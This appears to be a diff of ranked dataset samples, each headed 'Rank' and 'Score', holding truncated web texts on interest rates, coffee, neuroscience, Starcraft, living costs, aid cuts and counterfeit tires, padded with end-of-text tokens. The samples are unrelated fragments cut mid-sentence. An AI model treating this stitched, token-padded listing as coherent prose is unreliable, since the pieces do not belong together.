and it shows that, at the very least, it’s more expensive for Members of Congress to live in the nation’s capital on their $174,000 salary than in any state from which they hail. @@ -1244,157 +1338,79 @@ Also read: Is it time to freak out about housing? Why the housing sector won’t save the broader economy<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 57; Score = 745472.0 -<|begin_of_text|>At its meeting today, the Board decided to reduce the cash rate by 25 basis points to 3.0 per cent, effective 5 December 2012. - -Global growth is forecast to be a little below average for a time. Risks to the outlook are still seen to be on the downside, largely as a result of the situation in Europe, though the uncertainty over the course of US fiscal policy is also weighing on sentiment at present. Recent data suggest that the US economy is recording moderate growth and that growth in China has stabilised. Around Asia generally, growth has been dampened by the more moderate Chinese expansion and the weakness in Europe. - -Key commodity prices for Australia remain significantly lower than earlier in the year, though trends have been more mixed over the past few months. The terms of trade have declined by about 15 per cent since the peak, to a level that is still historically high. - -Sentiment in financial markets remains better than it was in mid year, in response to signs of progress in addressing Europe's financial problems, though Europe is likely to remain a source of instability for some time. Long-term interest rates faced by highly rated sovereigns, including Australia, remain at exceptionally low levels. Capital markets remain open to corporations and well-rated banks, and Australian banks have had no difficulty accessing funding, including on an unsecured basis. Borrowing conditions for large corporations are similarly attractive and share prices have risen since mid year. - -In Australia, most indicators available for this meeting suggest that growth has been running close to trend over the past year, led by very large increases in capital spending in the resources sector, while some other sectors have experienced weaker conditions. Looking ahead, recent data confirm that the peak in resource investment is approaching. As it does, there will be more scope for some other areas of demand to strengthen. - -Private consumption spending is expected to grow, but a return to the very strong growth of some years ago is unlikely. Available information suggests that the near-term outlook for non-residential building investment, and investment generally outside the resources sector, remains relatively subdued. Public spending is forecast to be constrained. On the other hand, there are indications of a prospective improvement in dwelling investment, with dwelling prices moving a little higher, rental yields increasing and building approvals having turned up. - -Inflation is consistent with the medium-term target, with underlying measures at around 2½ per cent. The introduction of the carbon price affected consumer prices in the September quarter, and there could be some further small effects over the next couple of quarters. Partly -================================================================================ -Rank = 58; Score = 745472.0 -<|begin_of_text|>Making coffee to drink - -For the agricultural and industrial processes for producing whole coffee beans, see Coffee processing - -Filter coffee being brewed - -Coffee preparation is the process of turning coffee beans into a beverage. While the particular steps vary with the type of coffee and with the raw materials, the process includes four basic steps: raw coffee beans must be roasted, the roasted coffee beans must then be ground, the ground coffee must then be mixed with hot water for a certain time (brewed), and finally the liquid coffee must be separated from the used grounds. - -Coffee is usually brewed immediately before drinking. In most areas, coffee may be purchased unprocessed, or already roasted, or already roasted and ground. Coffee is often vacuum packed to prevent oxidation and lengthen its shelf life. - -Roasting [ edit ] - -Dutch coffee-roasting machine, c. 1920 - -Roasting coffee transforms the chemical and physical properties of green coffee beans. When roasted, the green coffee bean expands to nearly double its original size, changing in color and density. As the bean absorbs heat, its color shifts to yellow, then to a light "cinnamon" brown, and then to a rich dark brown color. During roasting, oils appear on the surface of the bean. The roast will continue to darken until it is removed from the heat source. - -Coffee can be roasted with ordinary kitchen equipment (frying pan, grill, oven, popcorn popper) or by specialised appliances. A coffee roaster is a special pan or apparatus suitable to heat up and roast green coffee beans. - -Grinding [ edit ] - -An old-fashioned manual burr-mill coffee grinder - -Wheel coffee grinder - -Coffee grinder - -The whole coffee beans are ground, also known as milling, to facilitate the brewing process. - -The fineness of the grind strongly affects brewing. Brewing methods that expose coffee grounds to heated water for longer require a coarser grind than faster brewing methods. Beans that are too finely ground for the brewing method in which they are used will expose too much surface area to the heated water and produce a bitter, harsh, "over-extracted" taste. At the other extreme, an overly coarse grind will produce weak coffee unless more is used. Due to the importance of a grind's fineness, a uniform grind is highly desirable. - -If a brewing method is used in which the time of exposure of the ground coffee to the heated water is adjustable, then a short brewing time can be used for finely ground coffee. This produces coffee of equal flavor yet uses less ground coffee. A blade grinder does not -================================================================================ -Rank = 59; Score = 741376.0 -<|begin_of_text|>The brain - awake and sleeping - is awash in electrical activity, and not just from the individual pings of single neurons communicating with each other. In fact, the brain is enveloped in countless overlapping electric fields, generated by the neural circuits of scores of communicating neurons. The fields were once thought to be an "epiphenomenon, a 'bug' of sorts, occurring during neural communication," says neuroscientist Costas Anastassiou, a postdoctoral scholar in biology at the California Institute of Technology (Caltech). - -New work by Anastassiou and his colleagues, however, suggests that the fields do much more - and that they may, in fact, represent an additional form of neural communication. - -"In other words," says Anastassiou, the lead author of a paper about the work appearing in the journal Nature Neuroscience, "while active neurons give rise to extracellular fields, the same fields feed back to the neurons and alter their behavior," even though the neurons are not physically connected - a phenomenon known as ephaptic coupling. "So far, neural communication has been thought to occur at localized machines, termed synapses. Our work suggests an additional means of neural communication through the extracellular space independent of synapses." - -Extracellular electric fields exist throughout the living brain, though they are particularly strong and robustly repetitive in specific brain regions such as the hippocampus, which is involved in memory formation, and the neocortex, the area where long-term memories are held. "The perpetual fluctuations of these extracellular fields are the hallmark of the living and behaving brain in all organisms, and their absence is a strong indicator of a deeply comatose, or even dead, brain," Anastassiou explains. - -Previously, neurobiologists assumed that the fields were capable of affecting - and even controlling - neural activity only during severe pathological conditions such as epileptic seizures, which induce very strong fields. Few studies, however, had actually assessed the impact of far weaker - but very common - non-epileptic fields. "The reason is simple," Anastassiou says. "It is very hard to conduct an in vivo experiment in the absence of extracellular fields," to observe what changes when the fields are not around. - -To tease out those effects, Anastassiou and his colleagues, including Caltech neuroscientist Christof Koch, the Lois and Victor Troendle Professor of Cognitive and Behavioral Biology and professor of computation and neural systems, focused on strong but slowly oscillating fields, called local field potentials (L -================================================================================ -Rank = 60; Score = 724992.0 -<|begin_of_text|>The gustatory system creates the human sense of taste, allowing us to perceive different flavors from substances that we consume as food and drink. Gustation, along with olfaction (the sense of smell), is classified as chemoreception. Because it functions by reacting with molecular chemical compounds in a given substance. Specialized cells in the gustatory system that are located on the tongue are called taste buds, and they sense tastants (taste molecules). The taste buds send the information after coming in contact with food from the tastants to the brain, where a molecule is processed as a certain taste. There are five main tastes: bitter, salty, sweet, sour, and umami (savory). All the varieties of flavor we experience are a combination of some or all of these tastes. - -The sense of taste is transduced by taste buds. Which are clusters of 50-100 taste receptor cells located in the tongue, soft palate, epiglottis, pharynx, and esophagus. The tongue is the main sensory organ of the gustatory system. The tongue contains papillae, or specialized epithelial cells, which have taste buds on their surface. There are three types of papillae with taste buds in the human gustatory system: - -Loading... - -fungiform papillae, which are mushroom-shaped and located at the tip of the tongue; - -foliate papillae, which are ridges and grooves toward the back of the tongue; - -circumvallate papillae, which are circular-shaped and located in a row just in front of the end of the tongue. - -You can’t taste food unless it’s mixed with your saliva - -Each taste bud is flask-like in shape and formed by two types of cells: supporting cells and gustatory cells. Gustatory cells are short-lived and are continuously regenerating. They each contain a taste pore at the surface of the tongue which is the site of sensory transduction. Though there are small differences in sensation, all taste buds, no matter their location, can respond to all types of taste.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 61; Score = 720896.0 -<|begin_of_text|>What is Spending Skill? - -Summary: We measure your Spending Skill as a league score, ranging from Bronze to Grandmaster. For each game you play, your Average Unspent Resources (AUR) and Income are combined into a single number (called Spending Quotient, also known as SQ). Your Spending Skill is based on typical SQ levels for your race, region (NA, EU, etc) and game length. As you can see from the Spending Skill Stats, long games tend to have lower SQs. For example, an SQ of 76 for an EU Protoss in a 27-minute game is a Grandmaster-level performance, but in a 7-minute game that same SQ is only Platinum level. and then similarity-checked against our Starcraft library of more than 100,000 1v1 ladder games. - -There's an excellent article called Do you macro like a pro? which studies 2,100 games and proves that pros spend their resources better than noobs. - -Spending can make a big difference. Let's say you and your enemy have the same income, and the same tech, but you have 1,000 unspent resources and she has 0. Then her army is going to be 1,000 resources bigger than yours. That's 20 extra marines. Assuming her micro skill is equal to yours, then she's going to win. - -Don't let her win!! +Rank = 59; Score = 374784.0 +<|begin_of_text|>From the Kansas City Fed: Tenth District Manufacturing Activity Strengthened Further -After every game, the Score Screen shows your Average Unspent Resources (AUR). But that one number doesn't tell you if you did a good or bad job on spending. +The Federal Reserve Bank of Kansas City released the March Manufacturing Survey today. According to Chad Wilkerson, vice president and economist at the Federal Reserve Bank of Kansas City, the survey revealed that Tenth District manufacturing activity strengthened further with strong expectations for future activity. -An AUR of 1,000 is great when your Resource Collection Rate (aka Income) is 1,900, but it's not good when your Income is 400. So AUR alone isn't enough to know if your Spending was good. +“Our composite index accelerated again, and has only been higher one time in the last 15 years,” said Wilkerson. “The future employment index was the strongest in the 23-year history of the survey." -Do you macro like a pro? introduced the idea of Spending Quotient (SQ), a formula that combines AUR and Income into a single score, usually between 40 and 100, that measures how well you're spending. It's a nice formula, it's even got a logarithm in it. +... -Here's a calculator you can use to play with the SQ formula. +The month-over-month composite index was 20 in March, its highest reading since March 2011, up from 14 in February and 9 in March. The composite index is an average of the production, new orders, employment, supplier delivery time, and raw materials inventory indexes. Activity in both durable and nondurable goods plants increased, particularly for metals, computer, electronic, and aircraft products. Most month-over-month indexes rose further in March. The production and shipments indexes increased considerably, while the new orders and order backlog indexes rose more moderately but remained high. The employment index moderated slightly from 17 to 13, and the new orders for exports index also eased. Both inventory indexes increased for the second straight month. -Resource Collection Rate (Income) Average Unspent Resources Spending Quotient {{ sq }} +emphasis added -Grandmasters and pros get SQ around 100, and bronze leaguers get 40 or 50. +The Kansas City region was hit hard by the decline in oil prices, but activity is expanding solidly again. The regional Fed surveys released so far suggest another strong reading for the ISM manufacturing index for March.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 60; Score = 370688.0 +<|begin_of_text|>Everyone knows that the “genuine designer handbag” going for $20 from a street vendor is neither genuine nor designer, and indeed may not even hold up as a bag. But when you go to a reputable retailer and spend what it costs to replace the tires on your car, you expect to get what the real goods. Alas, Consumer Reports has found: just because there’s a brand name you know on the outside of a tire, doesn’t mean you’re getting what you should be. -However, when you get the data together for over 100,000 games*, the fuller picture emerges: +Consumer Reports (our parent organization) discovered the counterfeit tires while conducting otherwise routine tire performance tests. One tire brand, American Pacific Industries’ Pegasus Advanta for SUVs, performed very poorly in the tests and received a low rating. +The company then contacted Consumer Reports to ask about the way the tires were tested and to ask which batch CR had used. -================================================================================ -Rank = 62; Score = 720896.0 -<|begin_of_text|>Image copyright Getty Images Image caption Singapore has been moving up the ranks of the world's most expensive cities to live in over the last decade +That’s when the story gets interesting. It turned out that the tires being sold under API’s Pegasus brand were not what they appeared to be. The legally required date codes stamped into the tires indicated they had been made for API in a specific Chinese factory in August and December 2012. -Singapore has topped 131 cities globally to become the world's most expensive city to live in 2014, according to the Economist Intelligence Unit (EIU). +To which API replied: “American Pacific Industries’ relationship with this factory ended in 2011 [and] our records indicate the last shipment of these tires in the SUV pattern was in December of 2011.” -The city's strong currency combined with the high cost of running a car and soaring utility bills contributed to Singapore topping the list. +Further, API said, the factory had been destroyed after that contract concluded, and many of their molds went missing. “We have no idea who may have made these tires nor what they put in them,” the company’s COO told Consumer Reports. -It is also the most expensive place in the world to buy clothes. +Counterfeit tires pose two big challenges for consumers. One is that their quality may be lacking — as these were — and consumers aren’t getting what they paid for. And the other challenge is that in the event of a safety defect or a recall, consumers don’t really have any recourse. -Singapore replaces Tokyo, which topped the list in 2013. +Ordinarily, if there is a safety complaint about tires the National Highway Traffic Safety Administration issues a recall and the manufacturer has to replace the item. But if the problem with the item is that the manufacturer did not in fact actually manufacture them… then who would be responsible for a recall? It’s not an action that NHTSA could actually take. -Other cities making up the top five most expensive cities to live in are Paris, Oslo, Zurich and Sydney, with Tokyo falling to sixth place. +But there are federal actions available. It turns out that counterfeited imported goods fall under the purview of Immigration and Customs Enforcement. An ICE official told Consumer Reports, that if counterfeit tires are being made and smuggled, “We would investigate and try to mount an interdiction and +================================================================================ +Rank = 61; Score = 364544.0 +<|begin_of_text|>The bad news in today's PPI inflation report: pork prices surged yet again, rising 6.8% on the month, and up 24% from a year ago, while beef/veal costs rose by 2.1% on the month to a record indexed 251.8% (we dread to wade through the BLS "hedonic-adjustment" calculation for that particular food product) and are now up a sticky 27.4% from a year ago, which is just shy of the recent record Y/Y jump of 28.6% posted in August. So for all those who still see no inflation, could you please share you Delmonico's expense account with the rest of us? -The EIU's Worldwide Cost of Living Survey is a relocation tool that uses New York city as a base. It looks at more than 400 individual prices. +The good news: for the first time in years, booze prices declined from a year ago. So, with compliments of the hoapy president: don't be moapy and start drinking cheap booze, preferably early and often, as you try to remember - in an alcoholic daze - what beef tastes like.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 62; Score = 358400.0 +<|begin_of_text|>Overview -Top 5 most expensive cities Image copyright Getty Images Singapore, Singapore Paris, France Oslo, Norway Zurich, Switzerland Sydney, Australia +the growth in chronic disease -Soaring Asia +increasing patient expectations about access to services -The top 10 cities this year have been dominated by Asian and Australasian cities as well as some in Europe. +the number and range of health services provided -"Improving sentiment in structurally expensive European cities combined with the continued rise of Asian hubs means that these two regions continue to supply most of the world's most expensive cities," said the editor of the report, Jon Copestake. +the increasing cost of those services -"But Asian cities also continue to make up many of the world's cheapest, especially in the Indian subcontinent." +an ageing population. -Most Asian cities that top the list are there for predominantly higher costs of groceries. Tokyo is still at the top of the list for everyday food items. +Australia has a mixed public and private model of health care funding and service delivery. Private health insurance offers members greater choice in the provision of treatment, coverage for some services not included under Medicare arrangements, and may offer shorter waiting times for some services.As at 30 June 2015, 11.3 million Australians were covered by hospital treatment cover (47.4% of the population) and 13.3 million Australians had some form of general treatment cover (55.8% of the population). In 2014-15 the Australian Government spent $5.8 billion on the Private Health Insurance Rebate.In common with public health funding, private health insurance sustainability is being impacted by:The Australian Government is undertaking a number of reviews aimed at ensuring that consumers can access affordable, quality and timely health services into the future. -Inexpensive India +Private health insurance has important links to these reviews. As such, on 28 October 2015 the Minister for Health, the Hon Sussan Ley MP, announced consultations focused on the value of private health insurance for consumers and its long term sustainability. View the Scope of the Consultations here. -However, not all Asian cities are tough on the wallet. +Announcement of Consultations -India's major cities - including Mumbai and New Delhi - were found to be among the least expensive in the world. +Information for Consumers -Mumbai's prices are kept low by large income inequality. +Overview of Consultations -The low wages of many of the city's workers keep spending low, and government subsidies have helped them stay that way. +Minister Ley announced consultations on 28 October 2015 during her address to the National Press Club. View her address on the Department's website Private health insurance is complex. View the Consumer Fact Sheet For more information about private health insurance, visit the Private Health website (www.privatehealth.gov.au).An online consumer survey opened 8 November 2015 and closed on 7 December 2015. There was a large public response to the survey with over 40,000 Australians taking the opportunity to have their say on private health insurance.The results from the consumer survey showed that the cost of private health insurance was of greatest concern to consumers overall. Expense, affordability and lack of value for money were issues common to people both with and without private health insurance. -Outside of the subcontinent, Damascus in Syria saw the largest drop, becoming the fourth cheapest city in the world as the country's ongoing conflict has led to plummeting prices. +Targeted industry roundtables were held in the week of 16 November 2015. Eight roundtables were held in Canberra, Melbourne and Sydney with over 100 organisations represented. -Media playback is unsupported on your device Media caption Watch: Toby Iles from the Economist Intelligence Unit (EIU) explains to Sharanjit Leyl why Singapore is the most expensive city to live in +Interested stakeholders were able to provide submissions to the Department of Health by 4 December 2015. -While the EIU's survey takes into account the cost of living, other firms employ different research methods. +An issues paper was developed to guide the roundtables and submissions. -Mercer conducts research to determine the most expensive cities for +The written submissions indicated that stakeholders held a wide range of views on ================================================================================ -Rank = 63; Score = 716800.0 +Rank = 63; Score = 354304.0 <|begin_of_text|>Should we expect prices to fall all the way back? Well, in the late 1980s, Los Angeles experienced a large localized housing bubble: real home prices rose about 50 percent before the bubble popped. Home prices then proceeded to fall by a quarter, which combined with ongoing inflation brought real housing prices right back to their prebubble level. And here’s the thing: this process took more than five years — L.A. home prices didn’t bottom out until the mid-1990s. If the current housing slump runs on the same schedule, we won’t be seeing a recovery until 2011 or later. @@ -1413,102 +1429,91 @@ Newsletter Sign Up Continue reading the main story Please verify you're not a ro The Fed, in particular, has a hard time getting traction in ================================================================================ -Rank = 64; Score = 712704.0 -<|begin_of_text|>All funding for environment programs to end, as Coalition focuses aid on countries it needs to support its asylum policy - -Aid groups are accusing the Coalition of breaking an election commitment after it revealed their funding would be cut mid-year as part of a $650m reduction in the former government’s budgeted foreign aid spending, leaving 2013-14 spending $107m below what was spent last year. - -Foreign minister Julie Bishop announced the cuts for the groups as well as a complete defunding of international environmental programs. The government is redirecting a pared back aid budget towards the region and maintenance of spending on countries such as Papua New Guinea, Indonesia and Nauru, whose co-operation is necessary for the success of its asylum policy. +Rank = 64; Score = 350208.0 +<|begin_of_text|>When Jacob and Wilhelm Grimm published their “Children’s and Household Tales” in 1812, followed by a second volume in 1815, they had no idea that such stories as “Rapunzel,” “Hansel and Gretel,” and “Cinderella” would become the most celebrated in the world. Yet few people today are familiar with the majority of tales from the two early volumes, since in the next four decades the Grimms would publish six other editions, each extensively revised in content and style. For the very first time, ” The Original Folk and Fairy Tales of the Brothers Grimm” makes available in English all 156 stories from the 1812 and 1815 editions. These narrative gems, newly translated and brought together in one beautiful book, are accompanied by sumptuous new illustrations from award-winning artist Andrea Dezso. -Organisations such as Care, Save the Children, Caritas, ChildFund, Plan International and the Fred Hollows Foundation – who have partnership agreements with the government – have had their current year funding cut by about 8%. +From “The Frog King” to “The Golden Key,” wondrous worlds unfold–heroes and heroines are rewarded, weaker animals triumph over the strong, and simple bumpkins prove themselves not so simple after all. Esteemed fairy tale scholar Jack Zipes offers accessible translations that retain the spare description and engaging storytelling style of the originals. Indeed, this is what makes the tales from the 1812 and 1815 editions unique–they reflect diverse voices, rooted in oral traditions, that are absent from the Grimms’ later, more embellished collections of tales. Zipes’s introduction gives important historical context, and the book includes the Grimms’ prefaces and notes. -They say that means they are losing money already allocated to programs related to water and sanitation, elimination of violence against women, disaster reduction work and small-scale agriculture, among others. +The source material for Children’s and Household Tales was originally collected from books as well as friends and acquaintances in and around Kassel, Hesse in what is now Germany as well as Westphalia for the romantic poet Clemens Brentano between 1806 and 1812. Jacob and Wilhelm Grimm eventually came to distinguish between the Naturpoesie of the German Volk and the Kuntspoesie, or cultivated literature, which arose from and subsumed it. Ultimately, Brentano found the collected tales unsuitable toward his purposes and gave the brothers his blessing to do with them as they pleased. The first edition of Kinder- und Hausmärchen was published in 1812. -The organisations say the cuts clearly break a Coalition promise not to cut their funding when it announced a $4.5bn cut to the aid budget over the next four years two days before the federal election. +While even those tales were edited in order to create something more than a skeletal fragment of a story, they are generally representative of local traditions. The Grimms explained in their introduction (included) -At the time of that cut, the then shadow treasurer, Joe Hockey, and shadow finance spokesman, Andrew Robb, said “the Coalition will reprioritise foreign aid allocations towards non-government organisations that deliver on-the-ground support for those most in need”. +“We have tried to grasp and interpret these tales as purely as possible. In many of them one will find that the +================================================================================ +Rank = 65; Score = 346112.0 +<|begin_of_text|>Despite several quarters of rising GDP, and the upbeat exertions of Administration spokespeople, the National Bureau of Economic Research (NBER) has yet to announce the recession is over. Their reluctance is well-founded. It is beginning to dawn on even the more optimistic analysts that the tepid growth we have seen over the past three quarters is only an interlude in an otherwise grave and prolonged recession. Moreover, the respite will cost dearly as the United States has racked up a generation worth of debt for dubious benefit. -“That will also mean putting more money into NGOs who are on the ground and who can deliver aid more efficiently than through AusAID or indeed through some of the multilaterals that we’ve been putting money into in increasing numbers because AusAID cannot handle the increases in the budget,” then foreign affairs spokeswoman Julie Bishop said. +The paltry number of new jobs currently being created still fall far short of the 375,000 per 